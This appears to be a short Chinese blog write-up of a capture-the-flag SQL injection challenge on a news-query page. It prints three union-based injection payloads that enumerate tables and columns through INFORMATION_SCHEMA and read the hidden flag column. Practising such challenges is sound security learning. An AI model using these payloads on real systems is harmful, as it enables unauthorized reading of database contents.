这是一道关于SQL注入的题目。
首先打开题目网站发现是一个新闻查询界面
我们先测试一下有没有sql注入漏洞
明显是有的,现在就可以猜测列的数量了,经过多次测试,最多是三列。
所以现在开始爆破表的名字:
1′ union select 1,2,TABLE_NAME from INFORMATION_SCHEMA.TABLES #
发现有一个secret_table,猜测flag在里面
接下来继续爆破字段名:
1′ union select 1,2,COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=’secret_table’#
可知fl4g就是flag了,现在直接查找该字段内容
构建注入:1′ union select 1,2,fl4g from secret_table#
得到flag。
差不多就这样啦!有问题的话请告诉博主,我会改的,大家一起进步!